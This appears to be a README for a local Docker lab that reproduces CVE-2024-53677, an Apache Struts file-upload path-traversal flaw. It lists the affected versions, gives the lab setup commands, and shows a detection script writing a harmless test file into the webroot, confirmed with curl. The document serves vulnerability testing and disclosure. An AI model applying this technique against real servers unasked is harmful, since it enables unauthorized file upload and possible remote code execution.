Struts - CVE-2024-53677 / S2-067

File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.

Vulnerable versions:

• Struts 2.0.0 - Struts 2.3.37 (End-of-Life),

• Struts 2.5.0 - Struts 2.5.33, and

• Struts 6.0.0 - Struts 6.3.0.2

References:

• https://nvd.nist.gov/vuln/detail/CVE-2024-53677

• https://cwiki.apache.org/confluence/display/WW/S2-067

• https://xz.aliyun.com/t/13172?time__1311=GqmhkGOG8GkD%2FD0lD2nbDkYoiteSKcepD

---

Proof-of-Concept

Setup test environment

» git clone git@github.com:0xPThree/struts_cve-2024-53677.git
» cd struts_cve-2024-53677
» sudo docker build --ulimit nofile=122880:122880 -m 3G -t struts-6.3.0.1 .
» sudo docker run -p 8081:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name struts-6.3.0.1 struts-6.3.0.1

» curl http://127.0.0.1:8081/upload.action

<html>
  <head>
    <title>File upload</title>
  </head>
  <body>
    <h1>Apache Struts 6.3.0.1</h1>
    <p>Welcome to Apache Struts 6.3.0.1 lab. This application is vulnerable to CVE-2023-50164 and CVE-2024-53677.</p>
    <form id="upload" name="upload" action="/upload.action;jsessionid=196954CE343A603EC7EE26FFF611D302" method="post" enctype="multipart/form-data">
      <table class="wwFormTable">
        <tr>
          <td class="tdLabel"></td>
          <td 
            class="tdInput"            
            ><input type="file" name="upload" id="upload_upload"/></td>
        </tr>
        <tr>
          <td colspan="2">
            <div class="formButton"><input type="submit" value="Submit" id="upload_0"/></div>
          </td>
        </tr>
      </table>
    </form>
  </body>
</html>

Exploit

» curl http://127.0.0.1:8081/vuln_test.txt                                  
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;vuln_test.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.98</h3></body></html>

» python3 check.py -u http://127.0.0.1:8081 --upload_endpoint /upload.action
2025-01-07 12:21:20,822 [INFO] Starting detection process...
2025-01-07 12:21:20,822 [INFO] Starting detection for CVE-2024-53677 (S2-067)...
2025-01-07 12:21:20,823 [INFO] Sending test request to upload endpoint: http://127.0.0.1:8081/upload.action
2025-01-07 12:21:20,838 [INFO] [INFO] File upload request succeeded.
2025-01-07 12:21:20,838 [WARNING] [ALERT] File name overwrite detected. Target may be vulnerable!
2025-01-07 12:21:20,838 [INFO] Detection process completed.

» curl http://127.0.0.1:8081/vuln_test.txt                                  
CVE-2024-53677 / S2-067 detection test.

» sudo docker exec -it struts-6.3.0.1 bash
root@b991eecb47b4:/usr/local/tomcat# cd webapps/ROOT
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# ls -al
total 28
drwxr-x--- 5 root root 4096 Jan  7 11:23 .
drwxr-xr-x 1 root root 4096 Jan  7 11:18 ..
drwxr-x--- 2 root root 4096 Jan  7 11:14 forbidden
-rw-r----- 1 root root  226 Jan  7 09:41 index.html
drwxr-x--- 3 root root 4096 Jan  7 11:14 META-INF
-rw-r----- 1 root root   39 Jan  7 11:23 vuln_test.txt
drwxr-x--- 4 root root 4096 Jan  7 11:14 WEB-INF
root@b991eecb47b4:/usr/local/tomcat/webapps/ROOT# cat vuln_test.txt 
CVE-2024-53677 / S2-067 detection test.

Check script from: https://github.com/TAM-K592/CVE-2024-53677-S2-067/tree/ALOK